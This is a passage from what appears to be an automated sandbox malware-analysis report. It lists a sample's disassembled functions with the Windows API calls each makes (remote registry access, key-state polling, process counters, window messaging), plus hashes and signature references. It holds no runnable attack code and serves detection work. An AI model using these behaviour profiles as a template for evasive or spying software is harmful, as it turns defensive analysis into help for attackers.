                                                                                                                                                                            • Opcode Fuzzy Hash: f366c0f331b4738bd978fad7b5fb16746a7f8c5b12952ad1317543993c6afced
                                                                                                                                                                            • Instruction Fuzzy Hash: 8421D3795042099BDB209F699C44F9AB7E8AF45320F244A1EFDE0D73D0DB749841CF59
                                                                                                                                                                            Function 004CAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 004CAEBF
                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 004CAF13
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CAF2C
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,004EF910), ref: 004CAF6A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                            • API String ID: 3164766367-685833217
                                                                                                                                                                            • Opcode ID: 25fa76f18e0d5181c7db7e8f3d1c543a907218045d88f2a7d0f5d8baae87684e
                                                                                                                                                                            • Instruction ID: d48e12327bce1d0fea53c20a4e0c91e67162e1fb574746975fad3b47cc6ea4dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 25fa76f18e0d5181c7db7e8f3d1c543a907218045d88f2a7d0f5d8baae87684e
                                                                                                                                                                            • Instruction Fuzzy Hash: 43217434A00149AFCB10EF55C985EEE7BB8EF89708B10406EF505DB252DB75EE45CB25
                                                                                                                                                                            Function 004BA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                              • Part of subcall function 004BA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004BA399
                                                                                                                                                                              • Part of subcall function 004BA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 004BA3AC
                                                                                                                                                                              • Part of subcall function 004BA37C: GetCurrentThreadId.KERNEL32 ref: 004BA3B3
                                                                                                                                                                              • Part of subcall function 004BA37C: AttachThreadInput.USER32(00000000), ref: 004BA3BA
                                                                                                                                                                            • GetFocus.USER32 ref: 004BA554
                                                                                                                                                                              • Part of subcall function 004BA3C5: GetParent.USER32(?), ref: 004BA3D3
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004BA59D
                                                                                                                                                                            • EnumChildWindows.USER32(?,004BA615), ref: 004BA5C5
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004BA5DF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                            • API String ID: 1941087503-1110647743
                                                                                                                                                                            • Opcode ID: 6e5c35abc903a4983e1075440739b868243a42e65763a57ca7bfdba1c431a740
                                                                                                                                                                            • Instruction ID: b55d46d40ab0b09d58707b048079c54725b5e3833a887eb9234ea8c0dfed08e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5c35abc903a4983e1075440739b868243a42e65763a57ca7bfdba1c431a740
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B11A2B16002086BDF107F71DC85FEA37B8AF48704F04407ABE18AA152DA7859558B7E
                                                                                                                                                                            Function 004C2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 004C2048
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpper
                                                                                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                            • API String ID: 3964851224-769500911
                                                                                                                                                                            • Opcode ID: 68295b174edffc0e18e624f286be25897e4b79ab3ab437480915784f4509929c
                                                                                                                                                                            • Instruction ID: bda2e3f4bc36c890cd98b5d17a0a52bf3e1e56e9f664eb429ef35cb17787f25d
                                                                                                                                                                            • Opcode Fuzzy Hash: 68295b174edffc0e18e624f286be25897e4b79ab3ab437480915784f4509929c
                                                                                                                                                                            • Instruction Fuzzy Hash: 97117934A501199FDF40EFA5C9809EEB7F0BF15308B10886ED951AB352EB76690ACB45
                                                                                                                                                                            Function 004DEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004DEF1B
                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004DEF4B
                                                                                                                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004DF07E
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004DF0FF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2364364464-0
                                                                                                                                                                            • Opcode ID: 6a0778a0592684dab1e48e3cabf2e5c002245c55c12193f95a46f7fe57d46f8d
                                                                                                                                                                            • Instruction ID: 9368488865765e5779371bf77dbfad6dada8c29f108ca24ea8d8bf7dd8c860a7
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a0778a0592684dab1e48e3cabf2e5c002245c55c12193f95a46f7fe57d46f8d
                                                                                                                                                                            • Instruction Fuzzy Hash: CE81A7716003009FD724EF25C896F2AB7E5AF48714F04891FF596DB392E7B5AC048B5A
                                                                                                                                                                            Function 004E02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0388
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004E03C7
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004E040E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 004E043A
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E0447
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3440857362-0
                                                                                                                                                                            • Opcode ID: 521557bff157a07f6e0bcab674900e5c48fd66ca574fb191831e3c05a0d37820
                                                                                                                                                                            • Instruction ID: 034ef5732d62f413aaa4effef370675a70fdff7256636e3a03f9a45ea2aa2411
                                                                                                                                                                            • Opcode Fuzzy Hash: 521557bff157a07f6e0bcab674900e5c48fd66ca574fb191831e3c05a0d37820
                                                                                                                                                                            • Instruction Fuzzy Hash: E7515C71208244AFD704EF56C881E6EB7E8FF84309F04892EB59587292EB78E945CB56
                                                                                                                                                                            Function 004CE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004CE88A
                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004CE8B3
                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004CE8F2
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004CE917
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004CE91F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1389676194-0
                                                                                                                                                                            • Opcode ID: 9392d554642849f36565eb0ba57f020494ca08ff18ebb7b3f10c6fd717c8d274
                                                                                                                                                                            • Instruction ID: 3328976adb8e747ca308e608732bb4dba01c744879b9b2a0ed7fc4133c1ad097
                                                                                                                                                                            • Opcode Fuzzy Hash: 9392d554642849f36565eb0ba57f020494ca08ff18ebb7b3f10c6fd717c8d274
                                                                                                                                                                            • Instruction Fuzzy Hash: 81514075600205DFCF00EF65C981A6EBBF5EF08314B1480AEE949AB361DB75ED05CB55
                                                                                                                                                                            Function 004EA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5ebda3ada33ad176cd4e05e1458bc72696520257428159ade49042c18ba0d008
                                                                                                                                                                            • Instruction ID: 892e5341830cef8ea8abfa2840ccb6e67c20bfc246729b00d8b6ba1a470783bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ebda3ada33ad176cd4e05e1458bc72696520257428159ade49042c18ba0d008
                                                                                                                                                                            • Instruction Fuzzy Hash: BC412835900294AFC720DF29CC88FAABBA4FB09311F144166FC15A73D1C774BD61DA5A
                                                                                                                                                                            Function 00462344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00462357
                                                                                                                                                                            • ScreenToClient.USER32(005267B0,?), ref: 00462374
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00462399
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 004623A7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                            • Opcode ID: 9f83a16b10e3cc7c770c25415f06ca747575b16d20284a47460a4a262dc35316
                                                                                                                                                                            • Instruction ID: 80a01eb91091bdd9460d03bb4abf2f2840193362d29b70d56a532fc108885c21
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f83a16b10e3cc7c770c25415f06ca747575b16d20284a47460a4a262dc35316
                                                                                                                                                                            • Instruction Fuzzy Hash: 1841D131904255FBCF158F75C884AEABB74FB05324F10436BF82496390D7785990DF9A
                                                                                                                                                                            Function 004B6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B695D
                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 004B69A9
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 004B69D2
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 004B69DC
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B69EB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2108273632-0
                                                                                                                                                                            • Opcode ID: 6e0758ec38cd32bf87c89b5efd87b8858519d174d0f4d35884b536fab29f28e3
                                                                                                                                                                            • Instruction ID: 0ea201bbe77dd31b3bf2236c2d8b9e38699b59e56e6c58db147d437792d67b71
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e0758ec38cd32bf87c89b5efd87b8858519d174d0f4d35884b536fab29f28e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 2931A5B1500246ABDB30CF749C84BF77BACAF16304F15416BE421D62A1D73C988ADBB9
                                                                                                                                                                            Function 004B8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004B8F12
                                                                                                                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 004B8FBC
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004B8FC4
                                                                                                                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 004B8FD2
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004B8FDA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                            • Opcode ID: 764a0bde9d7652068c69a73e1951caee33f11ef27f38d2ca19faad73328f1855
                                                                                                                                                                            • Instruction ID: 9c0f9bd82c2e020de7dff9841b7342233a88814ac85716b756880399f22164c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 764a0bde9d7652068c69a73e1951caee33f11ef27f38d2ca19faad73328f1855
                                                                                                                                                                            • Instruction Fuzzy Hash: BD31EE71500219EFDF00CF68D98CAEE7BBAEB44315F10422AF924EB2D1C7B49914CBA5
                                                                                                                                                                            Function 004BB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004BB6C7
                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004BB6E4
                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004BB71C
                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004BB742
                                                                                                                                                                            • _wcsstr.LIBCMT ref: 004BB74C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3902887630-0
                                                                                                                                                                            • Opcode ID: 08e32d683a09b3da954a134acbda3145b8810a99b62e22acd1cc18c2f4ee6889
                                                                                                                                                                            • Instruction ID: 75fdf368b5f66649094908f23c3a9909370629dbc3979524b6c6f6c5a678e08d
                                                                                                                                                                            • Opcode Fuzzy Hash: 08e32d683a09b3da954a134acbda3145b8810a99b62e22acd1cc18c2f4ee6889
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921D631204244BBEB256B3A9C49EBF7B98DF45710F00407BFC05CA2A1EFA9DC4193A9
                                                                                                                                                                            Function 004EB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004EB44C
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 004EB471
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004EB489
                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 004EB4B2
                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004D1184,00000000), ref: 004EB4D0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2294984445-0
                                                                                                                                                                            • Opcode ID: 5b336dff70182c66606a8b2685c03eedc7718e4fefc6c77e2b751833df6c7bcd
                                                                                                                                                                            • Instruction ID: 6a4c0742e7eb9830515f6a6b0ca140c6dec7323d08efa08ddc7e63bb1a6bc7a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b336dff70182c66606a8b2685c03eedc7718e4fefc6c77e2b751833df6c7bcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 7421B431910295AFCB208F39DC44A6B37A4FF15722F10473AF925D62E2E7349811DB84
                                                                                                                                                                            Function 004B97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004B9802
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004B9834
                                                                                                                                                                            • __itow.LIBCMT ref: 004B984C
                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004B9874
                                                                                                                                                                            • __itow.LIBCMT ref: 004B9885
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2983881199-0
